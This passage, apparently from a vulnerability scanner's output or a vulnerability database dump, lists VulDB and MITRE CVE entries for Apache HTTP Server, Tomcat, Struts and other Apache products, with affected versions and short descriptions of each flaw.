10048| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
10049| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
10050| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
10051| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
10052| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
10053| [63090] Apache Tomcat up to 4.1.24 denial of service
10054| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
10055| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
10056| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
10057| [62833] Apache CXF -/2.6.0 spoofing
10058| [62832] Apache Axis2 up to 1.6.2 spoofing
10059| [62831] Apache Axis up to 1.4 Java Message Service spoofing
10060| [62830] Apache Commons-httpclient 3.0 Payments spoofing
10061| [62826] Apache Libcloud up to 0.11.0 spoofing
10062| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
10063| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
10064| [62661] Apache Axis2 unknown vulnerability
10065| [62658] Apache Axis2 unknown vulnerability
10066| [62467] Apache Qpid up to 0.17 denial of service
10067| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
10068| [6301] Apache HTTP Server mod_pagespeed cross site scripting
10069| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
10070| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
10071| [62035] Apache Struts up to 2.3.4 denial of service
10072| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
10073| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
10074| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
10075| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
10076| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
10077| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
10078| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
10079| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
10080| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
10081| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
10082| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
10083| [61229] Apache Sling up to 2.1.1 denial of service
10084| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
10085| [61094] Apache Roller up to 5.0 cross site scripting
10086| [61093] Apache Roller up to 5.0 cross site request forgery
10087| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
10088| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
10089| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
10090| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
10091| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
10092| [60708] Apache Qpid 0.12 unknown vulnerability
10093| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
10094| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
10095| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
10096| [4882] Apache Wicket up to 1.5.4 directory traversal
10097| [4881] Apache Wicket up to 1.4.19 cross site scripting
10098| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
10099| [60352] Apache Struts up to 2.2.3 memory corruption
10100| [60153] Apache Portable Runtime up to 1.4.3 denial of service
10101| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
10102| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
10103| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
10104| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
10105| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
10106| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
10107| [4571] Apache Struts up to 2.3.1.2 privilege escalation
10108| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
10109| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
10110| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
10111| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
10112| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
10113| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
10114| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
10115| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
10116| [59888] Apache Tomcat up to 6.0.6 denial of service
10117| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
10118| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
10119| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
10120| [59850] Apache Geronimo up to 2.2.1 denial of service
10121| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
10122| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
10123| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
10124| [58413] Apache Tomcat up to 6.0.10 spoofing
10125| [58381] Apache Wicket up to 1.4.17 cross site scripting
10126| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
10127| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
10128| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
10129| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
10130| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
10131| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
10132| [57568] Apache Archiva up to 1.3.4 cross site scripting
10133| [57567] Apache Archiva up to 1.3.4 cross site request forgery
10134| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
10135| [4355] Apache HTTP Server APR apr_fnmatch denial of service
10136| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
10137| [57425] Apache Struts up to 2.2.1.1 cross site scripting
10138| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
10139| [57025] Apache Tomcat up to 7.0.11 information disclosure
10140| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
10141| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
10142| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
10143| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
10144| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
10145| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
10146| [56512] Apache Continuum up to 1.4.0 cross site scripting
10147| [4285] Apache Tomcat 5.x JVM getLocale denial of service
10148| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
10149| [4283] Apache Tomcat 5.x ServletContect privilege escalation
10150| [56441] Apache Tomcat up to 7.0.6 denial of service
10151| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
10152| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
10153| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
10154| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
10155| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
10156| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
10157| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
10158| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
10159| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
10160| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
10161| [54693] Apache Traffic Server DNS Cache unknown vulnerability
10162| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
10163| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
10164| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
10165| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
10166| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
10167| [54012] Apache Tomcat up to 6.0.10 denial of service
10168| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
10169| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
10170| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
10171| [52894] Apache Tomcat up to 6.0.7 information disclosure
10172| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
10173| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
10174| [52786] Apache Open For Business Project up to 09.04 cross site scripting
10175| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
10176| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
10177| [52584] Apache CouchDB up to 0.10.1 information disclosure
10178| [51757] Apache HTTP Server 2.0.44 cross site scripting
10179| [51756] Apache HTTP Server 2.0.44 spoofing
10180| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
10181| [51690] Apache Tomcat up to 6.0 directory traversal
10182| [51689] Apache Tomcat up to 6.0 information disclosure
10183| [51688] Apache Tomcat up to 6.0 directory traversal
10184| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
10185| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
10186| [50626] Apache Solr 1.0.0 cross site scripting
10187| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
10188| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
10189| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
10190| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
10191| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
10192| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
10193| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
10194| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
10195| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
10196| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
10197| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
10198| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
10199| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
10200| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
10201| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
10202| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
10203| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
10204| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
10205| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
10206| [47214] Apachefriends xampp 1.6.8 spoofing
10207| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
10208| [47162] Apachefriends XAMPP 1.4.4 weak authentication
10209| [47065] Apache Tomcat 4.1.23 cross site scripting
10210| [46834] Apache Tomcat up to 5.5.20 cross site scripting
10211| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
10212| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
10213| [86625] Apache Struts directory traversal
10214| [44461] Apache Tomcat up to 5.5.0 information disclosure
10215| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
10216| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
10217| [43663] Apache Tomcat up to 6.0.16 directory traversal
10218| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
10219| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
10220| [43516] Apache Tomcat up to 4.1.20 directory traversal
10221| [43509] Apache Tomcat up to 6.0.13 cross site scripting
10222| [42637] Apache Tomcat up to 6.0.16 cross site scripting
10223| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
10224| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
10225| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
10226| [40924] Apache Tomcat up to 6.0.15 information disclosure
10227| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
10228| [40922] Apache Tomcat up to 6.0 information disclosure
10229| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
10230| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
10231| [40656] Apache Tomcat 5.5.20 information disclosure
10232| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
10233| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
10234| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
10235| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
10236| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
10237| [40234] Apache Tomcat up to 6.0.15 directory traversal
10238| [40221] Apache HTTP Server 2.2.6 information disclosure
10239| [40027] David Castro Apache Authcas 0.4 sql injection
10240| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
10241| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
10242| [3414] Apache Tomcat WebDAV Stored privilege escalation
10243| [39489] Apache Jakarta Slide up to 2.1 directory traversal
10244| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
10245| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
10246| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
10247| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
10248| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
10249| [38524] Apache Geronimo 2.0 unknown vulnerability
10250| [3256] Apache Tomcat up to 6.0.13 cross site scripting
10251| [38331] Apache Tomcat 4.1.24 information disclosure
10252| [38330] Apache Tomcat 4.1.24 information disclosure
10253| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
10254| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
10255| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
10256| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
10257| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
10258| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
10259| [37292] Apache Tomcat up to 5.5.1 cross site scripting
10260| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
10261| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
10262| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
10263| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
10264| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
10265| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
10266| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
10267| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
10268| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
10269| [36225] XAMPP Apache Distribution 1.6.0a sql injection
10270| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
10271| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
10272| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
10273| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
10274| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
10275| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
10276| [34252] Apache HTTP Server denial of service
10277| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
10278| [33877] Apache Opentaps 0.9.3 cross site scripting
10279| [33876] Apache Open For Business Project unknown vulnerability
10280| [33875] Apache Open For Business Project cross site scripting
10281| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
10282| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
10283|
10284| MITRE CVE - https://cve.mitre.org:
10285| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
10286| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
10287| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
10288| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
10289| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
10290| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
10291| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
10292| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
10293| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
10294| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
10295| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
10296| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
10297| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
10298| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
10299| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
10300| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
10301| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
10302| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
10303| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
10304| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
10305| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
10306| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
10307| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
10308| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
10309| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
10310| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
10311| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
10312| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
10313| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
10314| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
10315| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
10316| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
10317| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
10318| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
10319| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
10320| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
10321| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
10322| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
10323| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
10324| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
10325| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
10326| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
10327| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
10328| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
10329| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
10330| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
10331| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
10332| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
10333| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
10334| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
10335| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
